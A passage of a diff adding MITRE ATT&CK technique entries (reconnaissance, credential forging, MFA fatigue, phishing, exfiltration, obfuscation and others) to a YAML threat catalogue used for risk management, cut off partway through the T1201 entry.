+    name: T1591 - Gather Victim Org Information
+    provider: MITRE ATT&CK
+    description: 'Adversaries may gather information about the victim''s organization
+      that can be used during targeting. Information about an organization may include
+      a variety of details, including the names of divisions/departments, specifics
+      of business operations, as well as the roles and responsibilities of key employees.
+
+
+      Adversaries may gather this information in various ways, such as direct elicitation
+      via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information
+      about an organization may also be exposed to adversaries via online or other
+      accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001)
+      or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation:
+      ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information
+      may reveal opportunities for other forms of reconnaissance (ex: [Phishing for
+      Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)),
+      establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+      or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+      initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or
+      [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+
+      https://attack.mitre.org/techniques/T1591'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1606
+    name: T1606 - Forge Web Credentials
+    provider: MITRE ATT&CK
+    description: 'Adversaries may forge credential materials that can be used to gain
+      access to web applications or Internet services. Web applications and services
+      (hosted in cloud SaaS environments or on-premise servers) often use session
+      cookies, tokens, or other materials to authenticate and authorize user access.
+
+
+      Adversaries may generate these credential materials in order to gain access
+      to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539),
+      [Steal Application Access Token](https://attack.mitre.org/techniques/T1528),
+      and other similar behaviors in that the credentials are new and forged by the
+      adversary, rather than stolen or intercepted from legitimate users.
+
+
+      The generation of web credentials often requires secret values, such as passwords,
+      [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic
+      seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Adversaries may
+      also forge tokens by taking advantage of features such as the `AssumeRole` and
+      `GetFederationToken` APIs in AWS, which allow users to request temporary security
+      credentials (i.e., [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005)),
+      or the `zmprov gdpak` command in Zimbra, which generates a pre-authentication
+      key that can be used to generate tokens for any user in the domain.(Citation:
+      AWS Temporary Security Credentials)(Citation: Zimbra Preauth)
+
+
+      Once forged, adversaries may use these web credentials to access resources (ex:
+      [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)),
+      which may bypass multi-factor and other authentication protection mechanisms.(Citation:
+      Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation:
+      Microsoft SolarWinds Customer Guidance)
+
+      https://attack.mitre.org/techniques/T1606'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1621
+    name: T1621 - Multi-Factor Authentication Request Generation
+    provider: MITRE ATT&CK
+    description: "Adversaries may attempt to bypass multi-factor authentication (MFA)\
+      \ mechanisms and gain access to accounts by generating MFA requests sent to\
+      \ users.\n\nAdversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078)\
+      \ may be unable to complete the login process if they lack access to the 2FA\
+      \ or MFA mechanisms required as an additional credential and security control.\
+      \ To circumvent this, adversaries may abuse the automatic generation of push\
+      \ notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta,\
+      \ or similar services to have the user grant access to their account.\n\nIn\
+      \ some cases, adversaries may continuously repeat login attempts in order to\
+      \ bombard users with MFA push notifications, SMS messages, and phone calls,\
+      \ potentially resulting in the user finally accepting the authentication request\
+      \ in response to \u201CMFA fatigue.\u201D(Citation: Russian 2FA Push Annoyance\
+      \ - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected\
+      \ Russian Activity Targeting Government and Business Entities Around the Globe)\n\
+      https://attack.mitre.org/techniques/T1621"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1554
+    name: T1554 - Compromise Client Software Binary
+    provider: MITRE ATT&CK
+    description: "Adversaries may modify client software binaries to establish persistent\
+      \ access to systems. Client software enables users to access services provided\
+      \ by a server. Common client software types are SSH clients, FTP clients, email\
+      \ clients, and web browsers.\n\nAdversaries may make modifications to client\
+      \ software binaries to carry out malicious tasks when those applications are\
+      \ in use. For example, an adversary may copy source code for the client software,\
+      \ add a backdoor, compile for the target, and replace the legitimate application\
+      \ binary (or support files) with the backdoored one. An adversary may also modify\
+      \ an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry\
+      \ point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the\
+      \ binary\u2019s legitimate execution. For example, an adversary may modify the\
+      \ entry point of a binary to point to malicious code patched in by the adversary\
+      \ before resuming normal execution flow.(Citation: ESET FontOnLake Analysis\
+      \ 2021)\n\nSince these applications may be routinely executed by the user, the\
+      \ adversary can leverage this for persistent access to the host.\nhttps://attack.mitre.org/techniques/T1554"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1212
+    name: T1212 - Exploitation for Credential Access
+    provider: MITRE ATT&CK
+    description: "Adversaries may exploit software vulnerabilities in an attempt to\
+      \ collect credentials. Exploitation of a software vulnerability occurs when\
+      \ an adversary takes advantage of a programming error in a program, service,\
+      \ or within the operating system software or kernel itself to execute adversary-controlled\
+      \ code.\_\n\nCredentialing and authentication mechanisms may be targeted for\
+      \ exploitation by adversaries as a means to gain access to useful credentials\
+      \ or circumvent the process to gain authenticated access to systems. One example\
+      \ of this is `MS14-068`, which targets Kerberos and can be used to forge Kerberos\
+      \ tickets using domain user permissions.(Citation: Technet MS14-068)(Citation:\
+      \ ADSecurity Detecting Forged Tickets) Another example of this is replay attacks,\
+      \ in which the adversary intercepts data packets sent between parties and then\
+      \ later replays these packets. If services don't properly validate authentication\
+      \ requests, these replayed packets may allow an adversary to impersonate one\
+      \ of the parties and gain unauthorized access or privileges.(Citation: Bugcrowd\
+      \ Replay Attack)(Citation: Comparitech Replay Attack)(Citation: Microsoft Midnight\
+      \ Blizzard Replay Attack)\n\nSuch exploitation has been demonstrated in cloud\
+      \ environments as well. For example, adversaries have exploited vulnerabilities\
+      \ in public cloud infrastructure that allowed for unintended authentication\
+      \ token creation and renewal.(Citation: Storm-0558 techniques for unauthorized\
+      \ email access)\n\nExploitation for credential access may also result in Privilege\
+      \ Escalation depending on the process targeted or credentials obtained.\nhttps://attack.mitre.org/techniques/T1212"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1590
+    name: T1590 - Gather Victim Network Information
+    provider: MITRE ATT&CK
+    description: 'Adversaries may gather information about the victim''s networks
+      that can be used during targeting. Information about networks may include a
+      variety of details, including administrative data (ex: IP ranges, domain names,
+      etc.) as well as specifics regarding its topology and operations.
+
+
+      Adversaries may gather this information in various ways, such as direct collection
+      actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or
+      [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information
+      about networks may also be exposed to adversaries via online or other accessible
+      data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation:
+      WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information
+      may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595)
+      or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)),
+      establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)
+      or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)),
+      and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+
+      https://attack.mitre.org/techniques/T1590'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1210
+    name: T1210 - Exploitation of Remote Services
+    provider: MITRE ATT&CK
+    description: "Adversaries may exploit remote services to gain unauthorized access\
+      \ to internal systems once inside of a network. Exploitation of a software vulnerability\
+      \ occurs when an adversary takes advantage of a programming error in a program,\
+      \ service, or within the operating system software or kernel itself to execute\
+      \ adversary-controlled code.\_A common goal for post-compromise exploitation\
+      \ of remote services is for lateral movement to enable access to a remote system.\n\
+      \nAn adversary may need to determine if the remote system is in a vulnerable\
+      \ state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046)\
+      \ or other Discovery methods looking for common, vulnerable software that may\
+      \ be deployed in the network, the lack of certain patches that may indicate\
+      \ vulnerabilities,  or security software that may be used to detect or contain\
+      \ remote exploitation. Servers are likely a high value target for lateral movement\
+      \ exploitation, but endpoint systems may also be at risk if they provide an\
+      \ advantage or access to additional resources.\n\nThere are several well-known\
+      \ vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple\
+      \ SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications\
+      \ that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662)\
+      \ and web server services.(Citation: NVD CVE-2014-7169)\n\nDepending on the\
+      \ permissions level of the vulnerable remote service an adversary may achieve\
+      \ [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)\
+      \ as a result of lateral movement exploitation as well.\nhttps://attack.mitre.org/techniques/T1210"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1534
+    name: T1534 - Internal Spearphishing
+    provider: MITRE ATT&CK
+    description: 'Adversaries may use internal spearphishing to gain access to additional
+      information or exploit other users within the same organization after they already
+      have access to accounts or systems within the environment. Internal spearphishing
+      is multi-staged campaign where an email account is owned either by controlling
+      the user''s device with previously installed malware or by compromising the
+      account credentials of the user. Adversaries attempt to take advantage of a
+      trusted internal account to increase the likelihood of tricking the target into
+      falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from
+      the Inside 2017)
+
+
+      Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)
+      or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part
+      of internal spearphishing to deliver a payload or redirect to an external site
+      to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056)
+      on sites that mimic email login interfaces.
+
+
+      There have been notable incidents where internal spearphishing has been used.
+      The Eye Pyramid campaign used phishing emails with malicious attachments for
+      lateral movement between victims, compromising nearly 18,000 email accounts
+      in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017)
+      The Syrian Electronic Army (SEA) compromised email accounts at the Financial
+      Times (FT) to steal additional account credentials. Once FT learned of the campaign
+      and began warning employees of the threat, the SEA sent phishing emails mimicking
+      the Financial Times IT department and were able to compromise even more users.(Citation:
+      THE FINANCIAL TIMES LTD 2019.)
+
+      https://attack.mitre.org/techniques/T1534'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1199
+    name: T1199 - Trusted Relationship
+    provider: MITRE ATT&CK
+    description: 'Adversaries may breach or otherwise leverage organizations who have
+      access to intended victims. Access through trusted third party relationship
+      abuses an existing connection that may not be protected or receives less scrutiny
+      than standard mechanisms of gaining access to a network.
+
+
+      Organizations often grant elevated access to second or third-party external
+      providers in order to allow them to manage internal systems as well as cloud-based
+      environments. Some examples of these relationships include IT services contractors,
+      managed security providers, infrastructure contractors (e.g. HVAC, elevators,
+      physical security). The third-party provider''s access may be intended to be
+      limited to the infrastructure being maintained, but may exist on the same network
+      as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078)
+      used by the other party for access to internal network systems may be compromised
+      and used.(Citation: CISA IT Service Providers)
+
+
+      In Office 365 environments, organizations may grant Microsoft partners or resellers
+      delegated administrator permissions. By compromising a partner or reseller account,
+      an adversary may be able to leverage existing delegated administrator relationships
+      or send new delegated administrator offers to clients in order to gain administrative
+      control over the victim tenant.(Citation: Office 365 Delegated Administration)
+
+      https://attack.mitre.org/techniques/T1199'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1593
+    name: T1593 - Search Open Websites/Domains
+    provider: MITRE ATT&CK
+    description: 'Adversaries may search freely available websites and/or domains
+      for information about victims that can be used during targeting. Information
+      about victims may be available in various online sites, such as social media,
+      new sites, or those hosting information about business operations such as hiring
+      or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails
+      Google Hacking)(Citation: ExploitDB GoogleHacking)
+
+
+      Adversaries may search in different online sites depending on what information
+      they seek to gather. Information from these sources may reveal opportunities
+      for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+      or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+      establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+      or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+      initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
+      or [Phishing](https://attack.mitre.org/techniques/T1566)).
+
+      https://attack.mitre.org/techniques/T1593'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1098
+    name: T1098 - Account Manipulation
+    provider: MITRE ATT&CK
+    description: "Adversaries may manipulate accounts to maintain and/or elevate access\
+      \ to victim systems. Account manipulation may consist of any action that preserves\
+      \ or modifies adversary access to a compromised account, such as modifying credentials\
+      \ or permission groups. These actions could also include account activity designed\
+      \ to subvert security policies, such as performing iterative password updates\
+      \ to bypass password duration policies and preserve the life of compromised\
+      \ credentials. \n\nIn order to create or manipulate accounts, the adversary\
+      \ must already have sufficient permissions on systems or the domain. However,\
+      \ account manipulation may also lead to privilege escalation where modifications\
+      \ grant access to additional roles, permissions, or higher-privileged [Valid\
+      \ Accounts](https://attack.mitre.org/techniques/T1078).\nhttps://attack.mitre.org/techniques/T1098"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1048
+    name: T1048 - Exfiltration Over Alternative Protocol
+    provider: MITRE ATT&CK
+    description: "Adversaries may steal data by exfiltrating it over a different protocol\
+      \ than that of the existing command and control channel. The data may also be\
+      \ sent to an alternate network location from the main command and control server.\
+      \  \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other\
+      \ network protocol not being used as the main command and control channel. Adversaries\
+      \ may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration\
+      \ Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can\
+      \ be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB\
+      \ or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux <code>curl</code>\
+      \ may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data\
+      \ from a system.(Citation: 20 macOS Common Tools and Techniques)\n\nMany IaaS\
+      \ and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub,\
+      \ and AWS S3) support the direct download of files, emails, source code, and\
+      \ other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009).\n\
+      https://attack.mitre.org/techniques/T1048"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1597
+    name: T1597 - Search Closed Sources
+    provider: MITRE ATT&CK
+    description: 'Adversaries may search and gather information about victims from
+      closed sources that can be used during targeting. Information about victims
+      may be available for purchase from reputable private sources and databases,
+      such as paid subscriptions to feeds of technical/threat intelligence data.(Citation:
+      D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable
+      sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling
+      Data)
+
+
+      Adversaries may search in different closed databases depending on what information
+      they seek to gather. Information from these sources may reveal opportunities
+      for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+      or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)),
+      establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587)
+      or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or
+      initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
+      or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
+
+      https://attack.mitre.org/techniques/T1597'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1566
+    name: T1566 - Phishing
+    provider: MITRE ATT&CK
+    description: "Adversaries may send phishing messages to gain access to victim\
+      \ systems. All forms of phishing are electronically delivered social engineering.\
+      \ Phishing can be targeted, known as spearphishing. In spearphishing, a specific\
+      \ individual, company, or industry will be targeted by the adversary. More generally,\
+      \ adversaries can conduct non-targeted phishing, such as in mass malware spam\
+      \ campaigns.\n\nAdversaries may send victims emails containing malicious attachments\
+      \ or links, typically to execute malicious code on victim systems. Phishing\
+      \ may also be conducted via third-party services, like social media platforms.\
+      \ Phishing may also involve social engineering techniques, such as posing as\
+      \ a trusted source, as well as evasive techniques such as removing or manipulating\
+      \ emails or metadata/headers from compromised accounts being abused to send\
+      \ messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:\
+      \ Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)\
+      \ Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)\
+      \ the identity of the sender which can be used to fool both the human recipient\
+      \ as well as automated security tools.(Citation: cyberproof-double-bounce) \n\
+      \nVictims may also receive phishing messages that instruct them to call a phone\
+      \ number where they are directed to visit a malicious URL, download malware,(Citation:\
+      \ sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)\
+      \ or install adversary-accessible remote management tools onto their computer\
+      \ (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:\
+      \ Unit42 Luna Moth)\nhttps://attack.mitre.org/techniques/T1566"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1110
+    name: T1110 - Brute Force
+    provider: MITRE ATT&CK
+    description: 'Adversaries may use brute force techniques to gain access to accounts
+      when passwords are unknown or when password hashes are obtained. Without knowledge
+      of the password for an account or set of accounts, an adversary may systematically
+      guess the password using a repetitive or iterative mechanism. Brute forcing
+      passwords can take place via interaction with a service that will check the
+      validity of those credentials or offline against previously acquired credential
+      data, such as password hashes.
+
+
+      Brute forcing credentials may take place at various points during a breach.
+      For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078)
+      within a victim environment leveraging knowledge gathered from other post-compromise
+      behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003),
+      [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password
+      Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may
+      also combine brute forcing activity with behaviors such as [External Remote
+      Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.
+
+      https://attack.mitre.org/techniques/T1110'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1565
+    name: T1565 - Data Manipulation
+    provider: MITRE ATT&CK
+    description: 'Adversaries may insert, delete, or manipulate data in order to influence
+      external outcomes or hide activity, thus threatening the integrity of the data.
+      By manipulating data, adversaries may attempt to affect a business process,
+      organizational understanding, or decision making.
+
+
+      The type of modification and the impact it will have depends on the target application
+      and process as well as the goals and objectives of the adversary. For complex
+      systems, an adversary would likely need special expertise and possibly access
+      to specialized software related to the system that would typically be gained
+      through a prolonged information gathering campaign in order to have the desired
+      impact.
+
+      https://attack.mitre.org/techniques/T1565'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1559
+    name: T1559 - Inter-Process Communication
+    provider: MITRE ATT&CK
+    description: "Adversaries may abuse inter-process communication (IPC) mechanisms\
+      \ for local code or command execution. IPC is typically used by processes to\
+      \ share data, communicate with each other, or synchronize execution. IPC is\
+      \ also commonly used to avoid situations such as deadlocks, which occurs when\
+      \ processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse\
+      \ IPC to execute arbitrary code or commands. IPC mechanisms may differ depending\
+      \ on OS, but typically exists in a form accessible through programming languages/libraries\
+      \ or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002)\
+      \ or [Component Object Model](https://attack.mitre.org/techniques/T1559/001).\
+      \ Linux environments support several different IPC mechanisms, two of which\
+      \ being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums,\
+      \ such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s,\
+      \ may also leverage underlying IPC mechanisms. Adversaries may also use [Remote\
+      \ Services](https://attack.mitre.org/techniques/T1021) such as [Distributed\
+      \ Component Object Model](https://attack.mitre.org/techniques/T1021/003) to\
+      \ facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)\n\
+      https://attack.mitre.org/techniques/T1559"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1001
+    name: T1001 - Data Obfuscation
+    provider: MITRE ATT&CK
+    description: 'Adversaries may obfuscate command and control traffic to make it
+      more difficult to detect. Command and control (C2) communications are hidden
+      (but not necessarily encrypted) in an attempt to make the content more difficult
+      to discover or decipher and to make the communication less conspicuous and hide
+      commands from being seen. This encompasses many methods, such as adding junk
+      data to protocol traffic, using steganography, or impersonating legitimate protocols.
+
+      https://attack.mitre.org/techniques/T1001'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1039
+    name: T1039 - Data from Network Shared Drive
+    provider: MITRE ATT&CK
+    description: 'Adversaries may search network shares on computers they have compromised
+      to find files of interest. Sensitive data can be collected from remote systems
+      via shared network drives (host shared directory, network file server, etc.)
+      that are accessible from the current system prior to Exfiltration. Interactive
+      command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106)
+      may be used to gather information.
+
+      https://attack.mitre.org/techniques/T1039'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1601
+    name: T1601 - Modify System Image
+    provider: MITRE ATT&CK
+    description: 'Adversaries may make changes to the operating system of embedded
+      network devices to weaken defenses and provide new capabilities for themselves.  On
+      such devices, the operating systems are typically monolithic and most of the
+      device functionality and capabilities are contained within a single file.
+
+
+      To change the operating system, the adversary typically only needs to affect
+      this one file, replacing or modifying it.  This can either be done live in memory
+      during system runtime for immediate effect, or in storage to implement the change
+      on the next boot of the network device.
+
+      https://attack.mitre.org/techniques/T1601'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1574
+    name: T1574 - Hijack Execution Flow
+    provider: MITRE ATT&CK
+    description: 'Adversaries may execute their own malicious payloads by hijacking
+      the way operating systems run programs. Hijacking execution flow can be for
+      the purposes of persistence, since this hijacked execution may reoccur over
+      time. Adversaries may also use these mechanisms to elevate privileges or evade
+      defenses, such as application control or other restrictions on execution.
+
+
+      There are many ways an adversary may hijack the flow of execution, including
+      by manipulating how the operating system locates programs to be executed. How
+      the operating system locates libraries to be used by a program can also be intercepted.
+      Locations where the operating system looks for programs/resources, such as file
+      directories and in the case of Windows the Registry, could also be poisoned
+      to include malicious payloads.
+
+      https://attack.mitre.org/techniques/T1574'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1078
+    name: T1078 - Valid Accounts
+    provider: MITRE ATT&CK
+    description: 'Adversaries may obtain and abuse credentials of existing accounts
+      as a means of gaining Initial Access, Persistence, Privilege Escalation, or
+      Defense Evasion. Compromised credentials may be used to bypass access controls
+      placed on various resources on systems within the network and may even be used
+      for persistent access to remote systems and externally available services, such
+      as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation:
+      volexity_0day_sophos_FW) Compromised credentials may also grant an adversary
+      increased privilege to specific systems or access to restricted areas of the
+      network. Adversaries may choose not to use malware or tools in conjunction with
+      the legitimate access those credentials provide to make it harder to detect
+      their presence.
+
+
+      In some cases, adversaries may abuse inactive accounts: for example, those belonging
+      to individuals who are no longer part of an organization. Using these accounts
+      may allow the adversary to evade detection, as the original account user will
+      not be present to identify any anomalous activity taking place on their account.(Citation:
+      CISA MFA PrintNightmare)
+
+
+      The overlap of permissions for local, domain, and cloud accounts across a network
+      of systems is of concern because the adversary may be able to pivot across accounts
+      and systems to reach a high level of access (i.e., domain or enterprise administrator)
+      to bypass access controls set within the enterprise.(Citation: TechNet Credential
+      Theft)
+
+      https://attack.mitre.org/techniques/T1078'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1571
+    name: T1571 - Non-Standard Port
+    provider: MITRE ATT&CK
+    description: 'Adversaries may communicate using a protocol and port pairing that
+      are typically not associated. For example, HTTPS over port 8088(Citation: Symantec
+      Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed
+      to the traditional port 443. Adversaries may make changes to the standard port
+      used by a protocol to bypass filtering or muddle analysis/parsing of network
+      data.
+
+
+      Adversaries may also make changes to victim systems to abuse non-standard ports.
+      For example, Registry keys and other configuration settings can be used to modify
+      protocol and port pairings.(Citation: change_rdp_port_conti)
+
+      https://attack.mitre.org/techniques/T1571'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1068
+    name: T1068 - Exploitation for Privilege Escalation
+    provider: MITRE ATT&CK
+    description: 'Adversaries may exploit software vulnerabilities in an attempt to
+      elevate privileges. Exploitation of a software vulnerability occurs when an
+      adversary takes advantage of a programming error in a program, service, or within
+      the operating system software or kernel itself to execute adversary-controlled
+      code. Security constructs such as permission levels will often hinder access
+      to information and use of certain techniques, so adversaries will likely need
+      to perform privilege escalation to include use of software exploitation to circumvent
+      those restrictions.
+
+
+      When initially gaining access to a system, an adversary may be operating within
+      a lower privileged process which will prevent them from accessing certain resources
+      on the system. Vulnerabilities may exist, usually in operating system components
+      and software commonly running at higher permissions, that can be exploited to
+      gain higher levels of access on the system. This could enable someone to move
+      from unprivileged or user level permissions to SYSTEM or root permissions depending
+      on the component that is vulnerable. This could also enable an adversary to
+      move from a virtualized environment, such as within a virtual machine or container,
+      onto the underlying host. This may be a necessary step for an adversary compromising
+      an endpoint system that has been properly configured and limits other privilege
+      escalation methods.
+
+
+      Adversaries may bring a signed vulnerable driver onto a compromised machine
+      so that they can exploit the vulnerability to execute code in kernel mode. This
+      process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation:
+      ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may
+      include the vulnerable driver with files delivered during Initial Access or
+      download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)
+      or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).
+
+      https://attack.mitre.org/techniques/T1068'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1531
+    name: T1531 - Account Access Removal
+    provider: MITRE ATT&CK
+    description: "Adversaries may interrupt availability of system and network resources\
+      \ by inhibiting access to accounts utilized by legitimate users. Accounts may\
+      \ be deleted, locked, or manipulated (ex: changed credentials) to remove access\
+      \ to accounts. Adversaries may also subsequently log off and/or perform a [System\
+      \ Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious\
+      \ changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42\
+      \ LockerGoga 2019)\n\nIn Windows, [Net](https://attack.mitre.org/software/S0039)\
+      \ utility, <code>Set-LocalUser</code> and <code>Set-ADAccountPassword</code>\
+      \ [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be\
+      \ used by adversaries to modify user accounts. In Linux, the <code>passwd</code>\
+      \ utility may be used to change passwords. Accounts could also be disabled by\
+      \ Group Policy. \n\nAdversaries who use ransomware or similar attacks may first\
+      \ perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485)\
+      \ and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede\
+      \ incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486)\
+      \ objective.\nhttps://attack.mitre.org/techniques/T1531"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1027
+    name: T1027 - Obfuscated Files or Information
+    provider: MITRE ATT&CK
+    description: "Adversaries may attempt to make an executable or file difficult\
+      \ to discover or analyze by encrypting, encoding, or otherwise obfuscating its\
+      \ contents on the system or in transit. This is common behavior that can be\
+      \ used across different platforms and the network to evade defenses. \n\nPayloads\
+      \ may be compressed, archived, or encrypted in order to avoid detection. These\
+      \ payloads may be used during Initial Access or later to mitigate detection.\
+      \ Sometimes a user's action may be required to open and [Deobfuscate/Decode\
+      \ Files or Information](https://attack.mitre.org/techniques/T1140) for [User\
+      \ Execution](https://attack.mitre.org/techniques/T1204). The user may also be\
+      \ required to input a password to open a password protected compressed/encrypted\
+      \ file that was provided by the adversary. (Citation: Volexity PowerDuke November\
+      \ 2016) Adversaries may also use compressed or archived scripts, such as JavaScript.\
+      \ \n\nPortions of files can also be encoded to hide the plain-text strings that\
+      \ would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A\
+      \ We Live Security Analysis) Payloads may also be split into separate, seemingly\
+      \ benign files that only reveal malicious functionality when reassembled. (Citation:\
+      \ Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also abuse [Command\
+      \ Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands\
+      \ executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).\
+      \ Environment variables, aliases, characters, and other platform/language specific\
+      \ semantics can be used to evade signature based detections and application\
+      \ control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye\
+      \ Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)\n\
+      https://attack.mitre.org/techniques/T1027"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1201
+    name: T1201 - Password Policy Discovery
+    provider: MITRE ATT&CK
+    description: 'Adversaries may attempt to access detailed information about the
+      password policy used within an enterprise network or cloud environment. Password
